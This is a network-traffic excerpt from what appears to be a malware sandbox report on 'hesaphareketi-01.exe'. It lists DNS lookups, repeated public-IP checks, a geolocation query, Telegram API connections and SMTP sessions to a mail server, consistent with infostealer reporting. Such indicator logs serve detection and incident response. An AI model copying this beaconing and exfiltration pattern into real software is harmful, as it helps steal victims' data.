Oct 3, 2024 09:11:36.050854921 CEST	80	49730	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:36.050909042 CEST	49730	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:36.054341078 CEST	49732	443	192.168.2.9	149.154.167.220
Oct 3, 2024 09:11:36.054393053 CEST	443	49732	149.154.167.220	192.168.2.9
Oct 3, 2024 09:11:36.054508924 CEST	49732	443	192.168.2.9	149.154.167.220
Oct 3, 2024 09:11:36.054941893 CEST	49732	443	192.168.2.9	149.154.167.220
Oct 3, 2024 09:11:36.054965973 CEST	443	49732	149.154.167.220	192.168.2.9
Oct 3, 2024 09:11:36.683969975 CEST	443	49732	149.154.167.220	192.168.2.9
Oct 3, 2024 09:11:36.684037924 CEST	49732	443	192.168.2.9	149.154.167.220
Oct 3, 2024 09:11:36.687719107 CEST	49732	443	192.168.2.9	149.154.167.220
Oct 3, 2024 09:11:36.687731981 CEST	443	49732	149.154.167.220	192.168.2.9
Oct 3, 2024 09:11:36.688038111 CEST	443	49732	149.154.167.220	192.168.2.9
Oct 3, 2024 09:11:36.689467907 CEST	49732	443	192.168.2.9	149.154.167.220
Oct 3, 2024 09:11:36.735409975 CEST	443	49732	149.154.167.220	192.168.2.9
Oct 3, 2024 09:11:36.929028034 CEST	443	49732	149.154.167.220	192.168.2.9
Oct 3, 2024 09:11:36.929115057 CEST	443	49732	149.154.167.220	192.168.2.9
Oct 3, 2024 09:11:36.929326057 CEST	49732	443	192.168.2.9	149.154.167.220
Oct 3, 2024 09:11:36.934967041 CEST	49732	443	192.168.2.9	149.154.167.220
Oct 3, 2024 09:11:43.788471937 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:43.794238091 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:43.794338942 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:44.422297955 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:44.422511101 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:44.427664042 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:44.651324987 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:44.652264118 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:44.659862041 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:44.883759022 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:44.884047985 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:44.888870001 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:45.112962008 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:45.113364935 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:45.118187904 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:45.481303930 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:45.481457949 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:45.486260891 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:45.713601112 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:45.713757992 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:45.718631029 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:46.141494036 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:46.142318010 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:46.142410040 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:46.142410040 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:46.142446041 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:46.147296906 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:46.147330046 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:46.147443056 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:46.147473097 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:46.561744928 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:46.603909969 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:48.074827909 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:48.079824924 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:48.303304911 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:48.303553104 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:48.304615974 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:48.309473038 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:48.309578896 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:48.311326027 CEST	587	49733	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:48.311405897 CEST	49733	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:49.818443060 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:49.818744898 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:49.819036961 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:49.819098949 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:49.819428921 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:49.819479942 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:49.822271109 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:49.822313070 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:49.823704004 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:50.049725056 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:50.049994946 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:50.054946899 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:50.281033993 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:50.281378984 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:50.286338091 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:50.610210896 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:50.610495090 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:50.615364075 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:50.844310999 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:50.844556093 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:50.849395037 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:51.082515955 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:51.082670927 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:51.087563038 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:51.575171947 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:51.575675964 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:51.575930119 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:51.576118946 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:51.576186895 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:11:51.580544949 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:51.580714941 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:51.580837011 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:51.580894947 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:51.580909014 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:52.146908045 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:11:52.197678089 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:13:28.105871916 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:13:28.111685991 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:13:28.340640068 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:13:28.340846062 CEST	49734	587	192.168.2.9	77.245.159.27
Oct 3, 2024 09:13:28.347320080 CEST	587	49734	77.245.159.27	192.168.2.9
Oct 3, 2024 09:13:28.347476006 CEST	49734	587	192.168.2.9	77.245.159.27

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:11:19.604510069 CEST	49591	53	192.168.2.9	1.1.1.1
Oct 3, 2024 09:11:20.283349991 CEST	53	49591	1.1.1.1	192.168.2.9
Oct 3, 2024 09:11:21.200622082 CEST	55729	53	192.168.2.9	1.1.1.1
Oct 3, 2024 09:11:21.207983971 CEST	53	55729	1.1.1.1	192.168.2.9
Oct 3, 2024 09:11:36.045802116 CEST	64711	53	192.168.2.9	1.1.1.1
Oct 3, 2024 09:11:36.053600073 CEST	53	64711	1.1.1.1	192.168.2.9
Oct 3, 2024 09:11:43.473709106 CEST	56449	53	192.168.2.9	1.1.1.1
Oct 3, 2024 09:11:43.787724018 CEST	53	56449	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 09:11:19.604510069 CEST	192.168.2.9	1.1.1.1	0x29d5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:21.200622082 CEST	192.168.2.9	1.1.1.1	0xe7b4	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:36.045802116 CEST	192.168.2.9	1.1.1.1	0x114	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:43.473709106 CEST	192.168.2.9	1.1.1.1	0x3caa	Standard query (0)	mail.obaambalaj.com.tr	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 09:11:20.283349991 CEST	1.1.1.1	192.168.2.9	0x29d5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2024 09:11:20.283349991 CEST	1.1.1.1	192.168.2.9	0x29d5	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:20.283349991 CEST	1.1.1.1	192.168.2.9	0x29d5	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:20.283349991 CEST	1.1.1.1	192.168.2.9	0x29d5	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:20.283349991 CEST	1.1.1.1	192.168.2.9	0x29d5	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:20.283349991 CEST	1.1.1.1	192.168.2.9	0x29d5	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:21.207983971 CEST	1.1.1.1	192.168.2.9	0xe7b4	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:21.207983971 CEST	1.1.1.1	192.168.2.9	0xe7b4	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:36.053600073 CEST	1.1.1.1	192.168.2.9	0x114	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:11:43.787724018 CEST	1.1.1.1	192.168.2.9	0x3caa	No error (0)	mail.obaambalaj.com.tr		77.245.159.27	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49708	193.122.6.168	80	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:11:20.294878960 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:11:20.929568052 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1a6d90d78cad8eed407b9b5244c711a0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 3, 2024 09:11:20.937781096 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:11:21.125109911 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f44b0966175c22e790307cf29d9c6290 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 3, 2024 09:11:22.393657923 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:11:22.656675100 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8a03ee24789533583d99669b3bc3b9da Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49712	193.122.6.168	80	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:11:23.293189049 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:11:23.933223009 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e7ecd1eeb7815afdd1960a9b5de77692 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49715	193.122.6.168	80	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:11:24.728694916 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:11:26.712038994 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1d3c9f4ed60d11eba55ba362b55d4c39 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 3, 2024 09:11:26.712404013 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1d3c9f4ed60d11eba55ba362b55d4c39 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 3, 2024 09:11:26.712444067 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1d3c9f4ed60d11eba55ba362b55d4c39 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 3, 2024 09:11:26.712949038 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1d3c9f4ed60d11eba55ba362b55d4c39 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49717	193.122.6.168	80	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:11:27.321232080 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:11:27.945125103 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a24bb9ad77629c5cdf53554abc649447 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49719	193.122.6.168	80	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:11:28.557998896 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:11:29.784427881 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5b7a0350b7b6d4dd12ff2aa64e7e6eca Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49721	193.122.6.168	80	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:11:30.390239954 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:11:31.019678116 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8cfdbe6a9bfca9d4be3b993a2f398c74 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49723	193.122.6.168	80	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:11:31.638338089 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:11:32.939493895 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8a2a0686a87a54485fb23f3234754934 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49730	193.122.6.168	80	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:11:33.578594923 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:11:35.391427040 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b48111256bcc95845b24f04884a82fdb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49709	188.114.96.3	443	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:11:22 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:11:22 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63276 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEskwx3Fiz61QkgEqJSVYdmN9DND8EVqQBFYGirsTziHF4tPTE7HmJik61O7RJwPHPXezXeF0N9CgW4BaCb2%2FDDmsfgl1IX%2FKKSKH29Q3Un4DCMVDwgqvCLa70uAeMLMwP4ctmuh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb1e233cd68cb1-EWR alt-svc: h3=":443"; ma=86400
